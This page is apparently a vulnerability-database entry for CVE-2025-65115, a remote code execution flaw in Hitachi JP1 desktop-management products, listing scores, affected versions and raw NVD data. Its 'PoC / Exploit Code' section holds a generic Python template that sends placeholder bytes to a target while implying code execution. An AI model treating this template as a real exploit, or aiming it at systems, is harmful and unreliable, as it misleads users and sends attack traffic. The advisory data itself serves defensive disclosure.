Security Vulnerability Report
中文
CVE-2025-65115 CVSS 8.8 HIGH

CVE-2025-65115

Published: 2026-04-07 06:16:41
Last Modified: 2026-04-28 17:00:19

Description

Remote Code Execution Vulnerability in JP1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management 2 - Operations Director on Windows, Job Management Partner 1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management - Manager on Windows, Job Management Partner 1/IT Desktop Management - Manager on Windows, JP1/NETM/DM Manager on Windows, JP1/NETM/DM Client on Windows, Job Management Partner 1/Software Distribution Manager on Windows, Job Management Partner 1/Software Distribution Client on Windows.This issue affects JP1/IT Desktop Management 2 - Manager: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; JP1/IT Desktop Management 2 - Operations Director: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; Job Management Partner 1/IT Desktop Management 2 - Manager: from 10-50 through 10-50-11; JP1/IT Desktop Management - Manager: from 09-50 through 10-10-16; Job Management Partner 1/IT Desktop Management - Manager: from 09-50 through 10-10-16; JP1/NETM/DM Manager: from 09-00 through 10-20-02; JP1/NETM/DM Client: from 09-00 through 10-20-02; Job Management Partner 1/Software Distribution Manager: from 09-00 through 09-51-13; Job Management Partner 1/Software Distribution Client: from 09-00 through 09-51-13.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:hitachi:job_management_partner_1\/it_desktop_management-manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:job_management_partner_1\/it_desktop_management-manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:job_management_partner_1\/it_desktop_management-manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:job_management_partner_1\/it_desktop_management-manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:job_management_partner_1\/it_desktop_management-manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:a:hitachi:jp1\/it_desktop_management_2-manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:jp1\/it_desktop_management_2-manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:jp1\/it_desktop_management_2-manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:jp1\/it_desktop_management_2-manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:jp1\/it_desktop_management_2-manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:a:hitachi:jp1\/it_desktop_management_2-operations_director:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:jp1\/it_desktop_management_2-operations_director:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:jp1\/it_desktop_management_2-operations_director:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:jp1\/it_desktop_management_2-operations_director:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:jp1\/it_desktop_management_2-operations_director:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:a:hitachi:jp1\/netm\/dm_manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:jp1\/netm\/dm_manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:jp1\/netm\/dm_manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:jp1\/netm\/dm_manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:jp1\/netm\/dm_manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:a:hitachi:jp1\/netm\/dm_client:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:jp1\/netm\/dm_client:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:jp1\/netm\/dm_client:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:jp1\/netm\/dm_client:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hitachi:jp1\/netm\/dm_client:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
JP1/IT Desktop Management 2 - Manager: 13-50 before 13-50-02, 13-11 before 13-11-04, 13-10 before 13-10-07, 13-01 before 13-01-07, 13-00 before 13-00-05, 12-60 before 12-60-12, 10-50 through 12-50-11
JP1/IT Desktop Management 2 - Operations Director: 13-50 before 13-50-02, 13-11 before 13-11-04, 13-10 before 13-10-07, 13-01 before 13-01-07, 13-00 before 13-00-05, 12-60 before 12-60-12, 10-50 through 12-50-11
Job Management Partner 1/IT Desktop Management 2 - Manager: 10-50 through 10-50-11
JP1/IT Desktop Management - Manager: 09-50 through 10-10-16
Job Management Partner 1/IT Desktop Management - Manager: 09-50 through 10-10-16
JP1/NETM/DM Manager: 09-00 through 10-20-02
JP1/NETM/DM Client: 09-00 through 10-20-02
Job Management Partner 1/Software Distribution Manager: 09-00 through 09-51-13
Job Management Partner 1/Software Distribution Client: 09-00 through 09-51-13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import sys # PoC for CVE-2025-65115 # Note: This is a generic template as the specific payload logic is not publicly disclosed. # Target: Hitachi JP1 Series Products def send_exploit(target_ip, target_port): try: print(f"[*] Connecting to {target_ip}:{target_port}...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(10) s.connect((target_ip, target_port)) # Malicious payload placeholder (e.g., buffer overflow or command injection) # Actual bytes depend on the specific protocol of JP1 products. payload = b"\x00\x01\x02\x03" + b"A" * 1000 + b"\x00" print("[*] Sending malicious payload...") s.send(payload) response = s.recv(1024) print(f"[+] Received response: {response}") s.close() print("[+] Exploit sent. Check target for code execution.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <IP> <PORT>") sys.exit(1) send_exploit(sys.argv[1], int(sys.argv[2]))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65115", "sourceIdentifier": "[email protected]", "published": "2026-04-07T06:16:40.537", "lastModified": "2026-04-28T17:00:19.313", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Remote Code Execution Vulnerability in JP1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management 2 - Operations Director on Windows, Job Management Partner 1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management - Manager on Windows, Job Management Partner 1/IT Desktop Management - Manager on Windows, JP1/NETM/DM Manager on Windows, JP1/NETM/DM Client on Windows, Job Management Partner 1/Software Distribution Manager on Windows, Job Management Partner 1/Software Distribution Client on Windows.This issue affects JP1/IT Desktop Management 2 - Manager: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; JP1/IT Desktop Management 2 - Operations Director: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; Job Management Partner 1/IT Desktop Management 2 - Manager: from 10-50 through 10-50-11; JP1/IT Desktop Management - Manager: from 09-50 through 10-10-16; Job Management Partner 1/IT Desktop Management - Manager: from 09-50 through 10-10-16; JP1/NETM/DM Manager: from 09-00 through 10-20-02; JP1/NETM/DM Client: from 09-00 through 10-20-02; Job Management Partner 1/Software Distribution Manager: from 09-00 through 09-51-13; Job Management Partner 1/Software Distribution Client: from 09-00 through 09-51-13."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hitachi:job_management_partner_1\\/it_desktop_management-manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "09-50", "versionEndIncluding": "09-50-03", "matchCriteriaId": "10C1B8DB-75C0-4D16-85B0-C6FE8B08F9CD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hitachi:job_management_partner_1\\/it_desktop_management-manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "09-51", "versionEndIncluding": "09-51-05", "matchCriteriaId": "D0D22C1C-B881-4091-8E48-BE2158B5341C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hitachi:job_management_partner_1\\/it_desktop_management-manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "10-00", "versionEndIncluding": "10-00-02", "matchCriteriaId": "7035F19B-7043-457F-AAB8-F29DF4FF1BEE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hitachi:job_management_partner_1\\/it_desktop_management-manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "10-01", "versionEndIncluding": "10-01-05", "matchCriteriaId": "7F7B8F74-63C5-407A-8694-C4DF81DFF76E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hitachi:job_management_partner_1\\/it_desktop_management-manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "10-02", "versionEndIncluding": "10-02-05", "matchCriteriaId": "565BF27B-44A4-42CF-8F49-F6D774A250D2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hitachi:job_management_partner_1\\/it_desktop_management-manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "10-10", "versionEndIncluding": "10-10-16", "matchCriteriaId": "AA7FB97D-5B44-4AB2-9A73-CAE8B938DCD7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hitachi:jp1\\/it_desktop_management_2-manager:*:*:*:*:*:*:*:*", "versi ... (truncated)